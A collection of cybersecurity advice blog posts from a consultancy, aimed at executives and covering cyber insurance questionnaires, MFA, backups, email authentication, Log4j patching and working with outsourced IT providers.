Common questions on insurance applications include:

Do you use MFA? Multi-factor authentication means users must go through a second step when logging in. A prevalent method for the second factor is using an authentication application on users’ phones. It is essential to use a number-matching requirement so that a user must type in a code displayed on their phone into their computer before authentication. Another second factor is time-based one-time password (TOTP) apps on phones that display a number on the phone that the user enters as part of the authentication process. The number displayed in the app resets periodically, typically every 30 seconds. Other factors include using hardware keys that plug into USB ports and biometrics, including fingerprints or facial recognition. A typical second factor is receiving an SMS text message with a code, but that method is vulnerable to attacks such as SIM Swapping. In the interest of security, you should enforce MFA everywhere possible, including VPN, Remote Desktop, and SaaS offerings.

Do you provide ongoing cybersecurity awareness training and periodic phishing simulation emails to measure worker proficiency? Your users must receive regular security awareness training, such as once per month and perhaps a comprehensive webinar or other presentation once a year. Additionally, services can send users a fraudulent or email phishing message once a month to measure their response, such as if they open the message, click on the simulated fraudulent link, and are duped into entering credentials. One often overlooked aspect of training and simulated phishing is that it might take time for your already overworked staff to configure, send, monitor, and produce reports about the results every month. You’re welcome to contact us to provide that service, and we do 100% of the work, so there is no additional burden on your workers. Training for new employees is available. We also provide comprehensive yearly training webinars and other presentations. Whatever training you use, be sure that it adapts to keep your users current with the rapidly evolving threat landscape.

Do you provide password management tools to users? Tools that remember and automatically enter users’ passwords can help encourage users to use different passwords for every login. Users with the habit of reusing passwords pose a risk to your organization. Once attackers compromise a password, they will attempt to use that same password at popular sites. This practice is sometimes called credential stuffing, and attackers can be very successful at breaking into sites if users reuse passwords. An added benefit is user productivity and user happiness. Ensure the company’s password manager uses strong encryption to store your passwords securely. Single Sign-On (SSO) is becoming more popular, allowing users to log in once to access multiple sites or resources.

Do you utilize geo-blocking or geo-filtering? These technologies identify computers, users, and email messages based on geographical locations. You will be more secure if you block email and login attempts from geographical areas where you never do business and block user logins from countries without users. While attackers can bypass these protections using VPNs, the protections are still helpful.

Are users local administrators? When you set up a new Windows or Apple computer, the user has local administrator access and can perform many activities, including installing programs. If an attacker manages to compromise that user’s account, the attacker has tremendous power to compromise that computer and potentially your entire organization. This topic is complex, but the goal of every organization must be to ensure all workers are “standard users” on their computers. Being a standard user limits what an attacker can damage and makes the user account more difficult to compromise in the first place. Privilege Access Management (PAM) solutions help manage local admin rights by controlling and monitoring privileged access to critical systems.

Do you segment your network? Network segmentation splits your network into smaller parts based on the purpose or type of device. For example, suppose you isolate your security cameras from your servers on a different network segment, such as a subnet or VLAN. If an attacker breaks into a security camera, segmentation can block their ability to hack your servers through the camera. Common segments include:

-Servers
-Desktops and Laptops
-Wireless Network
-VPN users
-Security cameras
-VoIP systems
-Different floors in your building or different buildings on your campus

It is possible to over-segment and create too much work for your IT Team, but that rarely happens. Your team will set up Access Control List (ACL) rules that limit communications between the segments to block unauthorized activities.

Have you established a security baseline for your systems? Have a documented standard configuration for security controls you enforce on your servers, workstations, and mobile devices.

How soon after release do you apply critical security updates to your devices? Microsoft, Apple, your firewall manufacturer, and other providers release security updates to programs to block attackers from using previously undetected security holes. You must apply the patches quickly to prevent attackers from exploiting the vulnerabilities. Testing patches before deployment is essential to avoid errors. Staging patches allows you to help ensure they don’t disrupt your production network. Zero-day patches and updates fix problems that attackers are already using to compromise systems.

Do you allow workers to use family computers or mobile devices to access email and work from home? Family computers are significantly less secure than company-issued devices that your IT Team manages, monitors and protects 24×7. It is relatively common for organizations to permit users to use their BYOD phones to access company email. Your insurance company could see that as a red flag against providing or renewing a policy. You’ll want to demonstrate other safeguards you use to minimize the risk.

Do you enforce EPP on all devices? Endpoint protection is a tool your IT Team can use to protect each device on your network. Ask your IT Team. Chances are they’ve implemented this solution. They might use Security Information and Event Management (SIEM) to enhance visibility and response. SIEM systems aggregate and analyze activity from different resources across your IT infrastructure.

Do you utilize EDR/XDR tools? Using Endpoint Detection and Response (EDR), Extended Detection and Response (XDR), or Managed Detection and Response (MDR) agents on the laptops can increase security by monitoring for malicious behavior known as an indicator of compromise (IoC). EDR/XDR tools provide many benefits, including continuously monitoring network devices and watching for suspicious activities or evidence that an attacker is compromising a system. EDR/XDR is designed to identify, isolate, and mitigate threats. EDR and XDR must be effectively monitored, managed, and updated. One way many organizations ease the burden on their internal IT Teams is to utilize a third-party MSSP to perform these tasks. Managed Detection and Response (MDR) means you pay a third-party provider to manage your EDR/XDR. One key point to remember is that attackers can also obtain these protection tools and continually seek ways to bypass them. We perform Red Team Exercises at companies to test the capabilities of the EDR and XDR protections. Do not make the common mistake of letting your guard down in other security areas after implementing EDR or XDR.

How frequently do you conduct internal and external security audits, vulnerability assessments, penetration tests, and Red Team Exercises? These tests identify previously undiscovered weaknesses in your security. Please get in touch with us if you need these services as part of a comprehensive security advisory service for executives to help them secure their organizations. We guide and become a resource for your existing IT team rather than replacing them.

Does your spam filter scan messages and attachments for malicious links? If the answer is no, you need to add these features immediately.

Do you use web filtering and DNS filtering? Web filtering features, often integrated with firewalls, allow your IT team to block known malicious sites, gambling, and other categories of websites. Domain Name Service (DNS) maps URL website names to addresses of servers on the web. DNS filtering services strive to identify malicious web servers and automatically block communications from your network to them. As a bonus, some services permit you to hinder users from accessing sites you might deem inappropriate.

Do you use SPF for email messages? The Sender Policy Framework is a protective solution that your IT Team can enable to permit your email servers to confirm that inbound email messages came from an approved server rather than a fraudster impersonating or spoofing a legitimate source. While they are at it, your IT Team can enable DKIM to help other organizations’ mail servers confirm that messages they receive from you are legitimate and unaltered. They can configure DMARC to tell remote email servers to throw away messages from fraudsters attempting to impersonate your organization. It is essential to regularly review your SPF, DKIM, and DMARC records to adapt to the changing configurations and threat landscape.

Do you identify storage locations and isolate PII, PHI, and other sensitive data? Determining where you store Personally Identifiable Information (PII), Protected Health Information (PHI), Cardholder Data (CHD), and other sensitive information is essential. Knowing where to store sensitive information is a fundamental step in protecting it. Do you keep the information isolated and protected? This identification and isolation is becoming even more critical due to the integration of AI into organizations, which might give AI access to company information.

Do you use role-based access control (RBAC) to limit user access based on their job functions, and how do you manage and monitor privileged accounts? Role-Based Access Control (RBAC) ensures that users only have access to the data and systems necessary for their specific job functions. This minimizes the risk of unauthorized access to sensitive information. Privileged accounts with higher access levels are managed through Privilege Access Management (PAM) solutions that monitor and control their use, reducing the risk of misuse or compromise. Regular audits and real-time monitoring of these accounts are essential to detect and respond to suspicious activities.

Do you encrypt sensitive data at rest and in transit, and what encryption standards do you use? Encryption is critical for protecting sensitive data when it is stored (at rest) and transmitted (in transit). Encryption standards such as Advanced Encryption Standard (AES) with 256-bit keys are commonly used to ensure robust security. Data at rest is encrypted to protect it from unauthorized access, even if physical security is breached. Data in transit is encrypted using protocols like TLS (Transport Layer Security) to prevent interception during transmission over networks.

How do you assess and manage third-party vendors’ cybersecurity risks and ensure vendors follow appropriate security practices? Third-party vendors can introduce significant cybersecurity risks. Assessing these risks involves regular security evaluations and audits of the vendors’ practices. It’s important to have contracts that require vendors to follow appropriate security practices tailored to their roles and services. Continuous monitoring and periodic reassessments ensure that vendors maintain the required security posture over time. Organizations can manage risks by working collaboratively with vendors to meet security expectations without imposing stringent certification requirements.

Do you use firewalls, intrusion detection/prevention systems (IDS/IPS), and other network security measures? Firewalls act as a barrier between the internal network and external threats, controlling incoming and outgoing traffic based on predetermined security rules. Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS) monitor network traffic for suspicious activities and take action to prevent potential breaches. These network security measures are crucial for protecting against unauthorized access and cyberattacks.

How do you secure remote access to your network? Securing remote access involves implementing measures such as Virtual Private Networks (VPNs), which encrypt the connection between remote users and the corporate network. Your IT professionals must manage remote devices to help increase security. Multi-factor authentication (MFA) adds an extra layer of security by requiring additional verification steps beyond just a password. Additionally, restricting remote access to only essential personnel and monitoring for unusual login activities are critical components of a secure remote access strategy. This is an extensive topic; please let us know if you want more information.

What physical security measures do you have in place to protect your data centers and offices? Physical security measures are essential to protect data centers and office premises from unauthorized access. These measures include access control systems like key cards or biometric scanners, surveillance cameras, and security personnel. Secure facilities should also have environmental controls such as fire suppression systems and backup power supplies to safeguard against physical threats and disasters. The Foster Institute offers full-scale Physical Red Team Exercises to test your physical security measures.

Are you compliant with relevant regulations and industry standards, such as GDPR, HIPAA, PCI-DSS, or ISO/IEC 27001, and how do you ensure ongoing compliance with these standards? Compliance with regulations and industry standards demonstrates a commitment to maintaining high security and privacy standards. Regular audits and assessments help ensure compliance with frameworks such as GDPR (General Data Protection Regulation), HIPAA (Health Insurance Portability and Accountability Act), PCI-DSS (Payment Card Industry Data Security Standard), and ISO/IEC 27001. Ongoing compliance is maintained through continuous monitoring, employee training, and updates to policies and procedures as standards evolve. Please let us know if you need help with achieving or maintaining compliance. The Foster Institute, Inc. can simplify and manage the process for you.

How do you secure mobile devices employees use to access company data and use mobile device management (MDM) solutions to enforce security policies on mobile devices? Mobile Device Management (MDM) solutions enforce security policies on employees’ mobile devices that access company data. These solutions can remotely manage and secure devices, ensuring they comply with organizational security standards. Features include enforcing strong passwords, encrypting data stored on the device, and remotely wiping data if a device is lost or stolen. This ensures that mobile devices do not become a weak point in the company’s overall security posture.

Do you store backups offline or on immutable storage? If an attacker gains access with the intent of encrypting or deleting data to demand ransom, they might attempt to destroy your ability to restore. They know you’re more likely to pay the ransom if you cannot restore sensitive data. So, you must isolate some backup data so the attacker cannot damage it. It is essential to have backups that threat actors cannot delete or damage if they break into your network. Immutable storage is data stored where you can access it, but no users, not even your administrators, can delete or alter the backup files. Cloud providers, such as Microsoft, offer immutable cloud storage. Other devices use write-once-read-many (WORM) technology to store data immutably. Offline backup is disconnected from your network. Some companies might use backup tapes or hard drives disconnected from the network and store them in a safe location for offline storage. Other organizations have a secondary network, isolated from the primary network, dedicated to their backup servers; the only connection is a server that transfers production network data to the backup network. It is best to store backups in diverse locations for redundancy and eliminate any single points of failure.

Do you encrypt your backups? If an unauthorized person accesses your backup data, it is useless if they cannot read the contents. Encryption is a setting in your backup software. There was a time when people wouldn’t encrypt backups because the backups would take much longer. With today’s technology, there should be little added time.

How often do you practice the restore process? If you have never practiced your complete restore process, do it now. Many organizations find out they cannot restore from their backups. Often, their failed attempt was the first time they’d ever tried to restore. It can be complicated to perform a test restore, so be prepared to give your IT Team additional time. If you outsource your IT, it is understandable that they’ll charge you for practicing the restore. Always perform restore tests in a controlled environment, separate from your production systems.

How long will it take to restore your data from backups? When you practice your complete restore process, measure the time it takes to restore. If you find out the duration is too long, you can take steps to speed up the process.

What steps do you take to prevent ransomware attacks? This space on the insurance application allows you to list the items above in statement form. Almost all security measures you use can protect against ransomware attacks or limit the impact.

Do you have a documented Disaster Recovery Plan (DRP) and Business Continuity Plan (BCP) in place? Documented disaster recovery plans demonstrate that you’ve thought through the processes required to recover from disruptive events. These plans should outline specific procedures for data recovery, system restoration, and maintaining business operations during and after an incident.

Do you conduct disaster recovery drills? Regular drills ensure your team is prepared to execute the DRP and BCP effectively. These drills can be as basic as tabletop exercises, where team members discuss their roles and responses to hypothetical scenarios, or as comprehensive as full-scale exercises that simulate actual disaster conditions and involve all aspects of the organization.

These are some of the most common questions on our customer’s insurance policy application and renewal forms. If you find others, please reach out for guidance.

The post Demystifying Questions Cyber Insurance Companies Will Ask You appeared first on Foster Institute.

The exploits may come in the form of attempts to get you to transfer money to a friend, someone threatening to send out defamatory information about you unless you pay them not to, or phony messages attempting to acquire some personally identifiable information from you.

Be sure to alert your family members that it could be a forgery, even if an email message appears to be from you. Family members should verbally speak to you if there is ever a concern about any communications that are purportedly from you. No one should ever respond to a suspicious email or text message.

Know that legitimate text messages claiming to be from organizations are usually from a five to six-digit source such as 26096. If the text message is from a phone number they don’t recognize, even if the digits are all run together, like 4105550009, there is a good chance the text is fraudulent.

Additionally, there are crucial steps you must take to help protect your devices, including iPhones, iPads, Android phones and tablets, laptops, desktop computers, and all of your devices. Keep the devices locked up when they are not in your possession. If someone gains physical access to your device, it is possible that they can steal information, both your history and real-time now and into the future.

Be sure to apply critical security updates to the operating systems and browsers when prompted. But watch out for fake requests. Update alerts should never come via email or text message; those are bogus and dangerous.

Avoid connecting to public WiFi networks in coffee shops, airports, and hotels. Using your phone as a hotspot is much safer. A VPN protects your privacy but doesn’t prevent attackers from targeting your device on the network.

Avoid using a family computer to do your online banking, connect to your office, or type sensitive information. Attackers seek to infect work-from-home computers, and family computers are often the most vulnerable. Use your laptop or computer dedicated to you so that another family member doesn’t accidentally install malware for attackers to monitor your keystrokes, take control, or dwell inside, waiting for you to log in to your office.

There are so many steps to take, and, primarily, you must have a heightened awareness that you are at an increased risk of attacks as a high net-worth individual. Consider having a cybersecurity advisor to guide you and your team as you increase your security. Be sure they hold top-level cybersecurity certifications, including CISSP, CEH, and CISA, to help you receive the best guidance.

Please forward this to your friends so that they are extra vigilant too.

The post Attackers are Targeting High Net Worth Individuals appeared first on Foster Institute.

An exception will be if you feel held hostage by them, or if there is some other outstanding reason they’ve failed you. Yes, we’ve seen horror stories. In those extreme cases, the executives had already decided to fire their outsourced firm.

When we perform cybersecurity consulting, unless the executives ask us to approach it differently, we give the outsourced firm the benefit of the doubt that their intentions are always to provide you with the best service possible. If we encounter a grave security mistake, that’s one purpose of the audit – for us to catch things like that so your IT providers can fix it. We almost always find at least one gaping hole, which is our specialty. After all, third-party IT companies are responsible for many aspects of your IT operations, while our focus is cybersecurity. Once outsourced IT firms realize we’re there to help and not replace them or their services, they relax, welcome input, and ask questions about the best way to protect you.

If you move to a new provider, there could be a steep learning curve before they can serve you at the same level. Keep in mind that your IT provider is already familiar with your systems and understands the unique challenges you face. Unless their turnover is high, the professionals that serve you know your team members and maintain a friendly, professional working relationship with them.

If you consider changing providers because some well-meaning person says you have the wrong brands of products, find out if their personal bias is evidence-based. If the specific solution your provider prefers meets all the functionality criteria, it is almost always best to allow your IT Professionals to select brands and vendors they like. They typically prefer particular brands and solutions for important reasons.

For example, their engineers might be most familiar with Cisco, Juniper, SonicWALL, WatchGuard, or one of the many other firewall brands. Most brands, if configured properly, will serve you well. As with automobile repairs, you want a technician familiar with your car’s brand. If you ask your outsourced IT company to support an unfamiliar product, you’re putting them in an uncomfortable position. They want to consistently produce excellent outcomes for you, and if you insist that they support a brand they are unfamiliar with, you could be setting them up for failure.

Your outsourced IT firm almost certainly has you set up with specific vendors for your anti-virus, anti-spam, backup solution, etc., because they have automated tools that allow them to monitor and manage your solutions. That efficiency of scale facilitates them taking optimum care of you. Deviating from their standard brands creates unnecessary expense and frustration. For this reason, if you do decide to change providers, prepare yourself for needing to replace some of your software and hardware to conform to the new IT provider’s preferred configuration.

If your provider is too slow to respond, perhaps they’re understaffed but have an expedited service option you could invest in to get priority access to their best engineers. Or maybe they have a different brand or product solution that permits them to use streamlined tools, but you’re still using products a previous IT firm installed.

Without knowing the brands you are using, I cannot say if you’ve got great ones. I can share that most brands have excellent products and solutions that work well when appropriately configured by knowledgeable professionals who’ve proven their proficiency by earning certifications on those brands.

Executives sometimes ask if they should seek a cheaper provider. We rarely see third-party IT companies overcharging for services. They are aware of the competitive nature of their business. Consider how much it would cost you if all your systems were down, and the investment you pay your IT support firm is probably worth it.

Yes, your IT provider might be priced higher, but consider their level of professionalism too. Are they quick to reply when you need them? Do they fix issues the first time?

It can be an excellent sign if you feel you don’t need your provider because you never have any problems. That can indicate that your IT firm is taking such good care of the inner workings of your systems that everything runs smoothly for you. If you did terminate your IT provider, things could start falling apart slowly, without being observable, until everything stacks up to the point when you suffer a disaster.

If you wonder if they are competent, consider asking them for a list of certifications they’ve earned from Microsoft, Cisco, or the brands and technologies they provide and support for you. If they’re not certified, encourage them to take the training and pass the tests. Certifications often involve significant expense and time, so don’t expect them to earn the credentials overnight. Passing the certificate will be a breeze if they’re already knowledgeable about the products they support. And during the training, they might find new ways to help your organization without you needing to buy more stuff. Everyone benefits.

Your firm may not have top-level cybersecurity certifications. Cybersecurity is a complicated and rapidly evolving field that requires intense specialization. We never have expectations that third-party computer services companies know everything there is to know about cybersecurity. We expect them to be open to cybersecurity recommendations. We’re thrilled to discuss and answer their questions as they tune the solutions from brands they sell and support.

As cybersecurity advisors, it is rewarding to see and facilitate, if necessary, our customers strengthening their relationship with their MSPs and other third-party IT firms. Sometimes it is a matter of us helping you identify the pros and cons of the add-on cybersecurity packages your provider offers. Or, if their package isn’t the perfect fit, sometimes you can negotiate the offerings to get the best solution.

Please forward this to your friends if they wonder if they should change to a new outsourced IT consulting firm. As long as they’re well-staffed, competent, and professional, there are many advantages to staying with the company with whom they have an established working relationship.

The post Reasons to Keep Your Same Outsourced Computer Consultant or Managed Service Provider appeared first on Foster Institute.

There are underutilized email settings that can:
-Prevent bad actors from sending email messages impersonating your organization’s email address
-Prevent your workers from receiving emails from bad actors impersonating a legitimate sender

Please forward this message to your IT professionals and ask if someone configured your organization’s email to support SPF, DKIM, and DMARC. Your IT team can contact your email provider for assistance.

SPF: Gives receiving email servers an opportunity to confirm a message came from your email servers and not from a fraudulent email server.

DKIM: Uses an encrypted signature that gives receiving email servers an opportunity to confirm a message is from you and that nobody has changed the message since you sent it.

DMARC: Allows you to create policies that tell receiving servers to allow, reject, or send messages to a spam folder when SPF or DKIM fails validation. DMARC can alert you when someone sends fraudulent email messages using your domain name.

Note: SPF, DKIM, and DMARC protect you based on the part of your email address after the at sign: yourcompanydomain.com. If someone receives an email message from your name at stumbling ballet dot com, they need to notice that’s not you. But sometimes, bad actors use a legitimate-looking address with a minor difference, such as changing one letter in the domain name.

Both the sending and receiving email servers must support SPF, DKIM, and DMARC. So, please forward this message to encourage all the other organizations you know to configure their settings.

Some organizations use free tools to make the process of creating the DNS records much easier. Example sites they use include https://easydmarc.com/tools/dkim-record-generator, https://www.dmarcanalyzer.com/spf/spf-record-generator/, and https://dmarcian.com/dmarc-record-wizard/ There are many other sites too. Some use mxtoolbox.com to check all three records.

The post Block Inbound and Outbound Fraudulent Email Messages appeared first on Foster Institute.

Think of buildings that have locked doors. If an employee lets a stranger tailgate and walks through the door behind your employee, the stranger doesn’t need a key or a badge.

It is the same with passwords. If an attacker is dwelling in a computer, the attacker waits for the user to log in, and now the attacker’s in too, even though they didn’t need to know the password or have a token, a text message, or anything else.

So don’t believe that having great authentication is the primary protection for your organization. Protect the computers from being compromised by managing security updates, restricting local user privileges, having IT security audits, and the other recommendations in the blog on our website, including this one fosterinstitute.com/executives-five-key-cybersecurity-steps-to-protect-your-organization-and-the-vital-timing/

Please forward this to your associates so that they know passwords and two-step logon are essential to have, and they are not enough.

The post How Attackers Bypass Your Password Protection Even if You Use Two-Step Login appeared first on Foster Institute.

1. Apply Critical Security Updates – This is an essential yet never-ending task. Executives decide how soon they want the updates installed after release. It is common to apply workstation updates immediately. Focus on updating servers as quickly as your IT team can support, preferably less than a week to test, practice uninstalling, and deploy updates in stages. Remember to update non-Microsoft products. Patch your infrastructure devices, including firewalls and routers.

2. Change User Accounts so they are not Local Administrators – By default, if an attacker takes over a user’s computer, the attacker will have full administrative rights. Your IT team must configure users to be local standard users each time you set up new computers

3. Ensure IT Pros Manage Computers – Provide Your IT Team time to configure remote management for every new device a worker will use. They need to control your anti-malware solution, manage patches, and perform other tasks on each computer via a management console.

4. Implement two-step login – Protection for your network, VPN, and online programs. If you choose, Microsoft allows you to get rid of passwords and use text messages, an authenticator app, or other ways to authenticate. One-tap login is convenient. Your IT team needs to set up the authentication on your services and enroll each new worker you add to your team.

5. Have an Independent Cybersecurity Advisor who Performs Yearly Comprehensive Testing – They will guide and answer your questions and perform comprehensive testing at least once a year.

If your team’s not had time to implement the other items in this list yet, the process might take a year, depending on their workload and expertise.

Additionally, Practice Restoring Your Data – It is not a trivial process to practice a full restore, but you must practice to ensure the process works and restores quickly enough. Practice yearly.

Please forward this message to your executive friends so they can visit about these essential steps with the IT Professionals who support their organizations.

The post Executives: Five Key Cybersecurity Steps to Protect Your Organization, and the Vital Timing appeared first on Foster Institute.

Organizational leaders, please support your IT teams by providing them with time to address this risky situation. They’re addressing many end-of-the-year tasks, and dealing with this potential crisis might delay their progress.

The Microsoft Threat Intelligence Center (MSTIC) reports that foreign governments are actively exploiting the situation now. Nation-states can attack the government, military, businesses, and individual users throughout the country.

One of a bad actor’s top priorities is establishing remote access into networks, computers, and electronic devices. Once they gain access, attackers can dwell quietly in networks to evade detection.

The US Cybersecurity Infrastructure Security Agency (CISA) ordered all federal agencies to patch Log4j by Christmas Eve. That could be too late because attackers started exploiting the vulnerability in late November.

And, of course, ransomware attacks exploiting Log4j will be more successful than ever.

Steps your IT Professionals and software developers can consider taking:

See guidance from the USA Cybersecurity Infrastructure Security Agency (CISA) https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance.

The Agency created and is updating an exhaustive list of affected software and tools at https://github.com/cisagov/log4j-affected-db. Review https://github.com/YfryTchsGD/Log4jAttackSurface too. That page lists well-known organizations including Amazon, Apple, Google, LinkedIn, and VMware. The great news is that highly qualified developers at those organizations started working on a fix immediately. The bad news is that attackers started developing exploits immediately too. That page lists well-known organizations including Amazon, Apple, Google, LinkedIn, and VMware. The great news is that highly qualified developers at those organizations started working on a fix immediately. The bad news is that attackers started developing exploits immediately too.

If your organization uses VMware, review their website to find guidance. An example page is https://blogs.vmware.com/cloud/2021/12/11/vmsa-2021-0028-log4j-what-you-need-to-know/.

Go to the Mitre.org page about CVE-2021-44228 https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228 and look through the references to identify links to guidance from your firewall manufacturer or VPN provider, including Cisco and SonicWALL.

Search the web using the keywords Log4j or CVE-2021-44228 with the names of products and applications you use.

Know that your organization is NOT safe if you don’t intentionally use open-source tools. Many tools and services integrate Log4j. If your network connects to services or other organizations that use Log4j, then Log4j might run on your clients too.

Block LDAP access if possible. Last week, we discovered LDAP open to the public side, available to all the world, of a network at one of the organizations we’re auditing right now. We notified their highly qualified and experienced IT team leader, and they closed the port immediately. They explained, “We had used that some time ago for connecting LDAP to service now before using (an updated) service. I never went back to clean it up until (now).” Had we not discovered the problem, the port would still be open today. There is no shame to the IT Pro. Most executives have no idea of the deluge of information that falls on IT departments daily, and the team’s goal is to focus on fixing broken problems first. That exposure can exist at any organization.

Move vulnerable servers into filtered subnets or VLANs to help wall them off from the rest of your network. Filter all traffic to allow only essential ports, protocols, sources, and destinations.

If you must expose LDAP, limit LDAP traffic to trusted endpoints only to help mitigate the risks.

If you have internally developed software or a website with active code, ask your developers to upgrade your log4j library to the newest version ASAP. Apache released a new log4j v 2.15.0 on December 6, 2021.

Apache provides technical details to help protect against the log4j exploits at https://logging.apache.org/log4j/2.x/security.html

Search your providers for any references to Logj4 or CVE-2021-44228
Many providers are still in the process of evaluating their products.
Examples include:
Amazon – in the process of updating products
Cisco products: Search the web for keywords: Vulnerability in Apache Log4j Library Affecting Cisco Products
FortiGuard: Search the web for keywords: FortiGuard Apache log4j2 log messages substitution
Juniper Networks: Search the web for keywords: Juniper 2021-12 Out of Cycle Security Advisory
McAfee: Search the web for keywords: McAfee Enterprise coverage for Apache Log4j CVE-2021-44228 Remote Code Execution
Okta: Search the web for keywords: Okta’s response to CVE-2021-44228 Log4Shell
Oracle: Search the web for keywords: Oracle Security Alert CVE-2021-44228
SolarWinds: Search the web for keywords: SolarWinds Apache Log4j Critical Vulnerability (CVE-2021-44228)0
SonicWall: Email Security is affected, and perhaps other products. Search the web for keywords: SonicWall Apache Log4j Remote Code Execution Vulnerability Log4Shell CVE-2021-44228
Symantec – Including Endpoint Protection Manager
VMware: Heavily impacted – see https://www.vmware.com/security/advisories/VMSA-2021-0028.html
Ubiquiti: Search the web for keywords Ubiquiti UniFi Network Application 6.5.54

Kudos to these organizations and others addressing the issues related to Log4j.

Thank you for helping make the world a safer place to live and work!

More information for executives about Log4j:

Log4j could affect your firewalls, VPN, websites you access, your cloud providers, apps, and ultimately you. The safest stance is to assume attackers compromised your systems and behave accordingly. Don’t panic. There’s no way to predict how severe, or hopefully mild, the fallout will be at your organization.

Ask your IT team to watch for abnormal behavior on your websites, networks, and computers. IT Teams can scroll down to the bottom of this message for technical suggestions to protect your organization.

Over the next several days, software and hardware vendors will release patches and updates to block the attack. But some attacks will succeed.

The log4j vulnerability is so easy to exploit that it causes a massive problem that could plague e-commerce sites, cloud services, SaaS offerings, apps, and devices that use Apache’s Log4j for logging for a long time until servers, applications, and hardware is patched or replaced.

The potential impact increases exponentially because if a consumer or business user uses a program to access a cloud service, then there’s a good chance that Log4j is running on the client program or app running on the customer’s computer, phone, or tablet. Until they install the patch from Microsoft, Minecraft gamers are vulnerable to attackers using the locally installed Minecraft program to compromise the user’s computer through something as simple as receiving a text message. The stakes get higher if a user’s or company’s banking software accesses a bank server running a vulnerable version of Log4j. The SolarWinds attack only affected some companies that ran the SolarWinds software on their networks. In this case, any companies that use any software or services that use the Log4j logging tool from Apache are potentially susceptible to attackers running programs on their network.

Then there is the question of what attackers will do. Will they plant ransomware in businesses and governments worldwide and keep it dormant, dwelling inside networks, to launch future attacks? Will attackers take over computers and devices to create a botnet army, sometimes without the owner’s knowledge? Will attackers use their army of machines to launch Distributed Denial of Service attacks that flood other services with so much traffic the targets shut down? In August, attackers launched a DDOS attack against Microsoft’s Azure cloud blasting Azure with more than 2.4 Terabits per second of disruptive traffic intended to overload Microsoft’s cloud. Amazon’s AWS and Google experienced similar attacks.

Interestingly, a security company released a “vaccine” program for the Log4j vulnerability. The script uses the remote code execution attack to fix the problem. Some gray hat hackers launch unapproved “attacks” across the Internet designed to mitigate the security problem and block other attacks. The hackers provide a “public service” delivered by random individuals to unknowing organizations without permission. And there’s a valid concern that bad actors could modify the tool to launch malicious attacks.

Exploits against log4j are emerging events. Attacks against Minecraft game users are in the news, but this potential crisis affects more than video games. Hopefully, there is no significant fallout, but the potential is enormous.

Keep your network safe.

The post Give Your IT Teams Guidance and Time to Address Log4j Cybersecurity Issues Immediately appeared first on Foster Institute.

None of these are unreasonable for you to request. You and your IT team can customize the letter to fit the relationship best. These recommendations apply even if a company doesn’t have servers and do all of their work in the cloud.

Dear – you fill in the blank,

We are checking in with all of our valued service providers, including you. If your organization suffers a significant security incident, you might not be able to provide the service we count on from you. A security breach at your organization could impact our business too. In the interest of helping you protect your organization, here are some guidelines:

You must have a robust disaster recovery plan. You must be able to recover quickly if you lose access to your information. Your IT team needs to practice restoring because experiencing ransomware is not the best time to practice restoring all of your data for the first time.

It is essential that your IT team, or IT company, manage the security of all of your computers, including the computers any work from home employees use. Your IT professionals need to monitor the security update status, manage anti-virus, and perform other administrative functions that help protect the computers that your workers use.

Please discuss with your IT team or IT company how quickly they deploy critical security updates to your computers. Security updates sometimes cause issues, so it is best to test updates, especially server updates if you have servers, before deploying them. Because the updates often prevent attacks, there is a level of urgency.

Remove programs you aren’t using. Attackers sometimes gain access to your systems through programs, and they cannot exploit a program that’s not installed. Flash is an example of a program installed on many computers, but it provides a security risk. Your IT team can give you the details and identify other programs they can remove from computers to increase security.

Ask your IT team to make sure to make your user accounts a “standard local user” on your computers. This one step can increase your security immensely. By default, users are local administrators on their computers. This setting applies to Mac and Windows computers. If an attacker breaks into their computer, they will have elevated abilities to conquer your security protections if the user is a local administrator.

Enable two-step verification on all the websites that require a login. In its most basic form, once a two-step login feature is enabled, when a user enters a username and password, their phone will receive a text message with a code to complete the login process. This added protection helps you tremendously if an attacker steals one of your website passwords. The setting is usually in the security settings of the website. Three places two-step login is essential:

-SaaS programs your users run in the cloud. Zoom, QuickBooks Online, an ERP, G Suite, Office 365, and SalesForce are SaaS offerings.
-VPN Connections
-Remote Desktop Connections

Realize that connecting from public networks, including coffee shops and hotels, is risky, even if the user uses a VPN. It is more secure to use a phone or personal hot-spot to connect a computer to the Internet. The added phone charges may be lower than you expect, especially if you change to a plan with unlimited data.

Please forward this to your service providers; it can help prevent big heartaches and expenses for you and them.

The post Help Your Third-Party Providers Be More Secure Because Your Security is Only as Good as Their Security appeared first on Foster Institute.

Consider backing up your data at a different cloud service. It is less likely that an attacker could compromise both systems if your users only have access to one.

There are many cloud backup solutions, and it is best to allow your IT team to use the one they prefer. The Foster Institute does not endorse nor receive any compensation for mentioning products and services. Two examples of services that work well for our customers include veeam.com and afi.ai.

One significant problem with cloud restores is that the restoration process can take a long time if you store large amounts of data. It is essential to practice the restore process to estimate how long a full restore would take.

Please forward this to your friends so that they know it is essential to backup cloud data too.

The post Be Sure to Back Up Your Cloud Data appeared first on Foster Institute.

I admire seeing how he communicates, and I’ve asked his secret. He tells me he focuses on his responsibility to protect his workers’ and customers’ sensitive information. Everything else falls into place.

If the consultants need to charge money to implement changes, he asks us if we feel the price is fair and then decides. He makes sure his consultants know he’s holding them accountable by bringing us back every year to audit the systems and provide new recommendations.

The outsourced computer consulting company was never upset and eagerly followed the executive’s directives. The IT firm has great respect for the executive because of his bold leadership. I admire the proficiency of his IT consulting firm in meeting requirements, even when they are surprised a customer has higher expectations than most of their other customers.

Fast forward many years: This company is, and continues to be, one of the most secure customers we have. The leader’s no-nonsense approach to cybersecurity works best. Thieves might have stolen the air conditioning compressor units from outside their buildings, but no hackers have broken into their network!

If you outsource IT, your consultant company respects that you make the decisions. They’ll welcome audit recommendations and your directives if you’re willing to pay a fair fee. Their goal is to keep you happy, not the other way around.

The post If You Outsource Your IT, it is Their Job to Keep You Happy, Not the Other Way Around. appeared first on Foster Institute.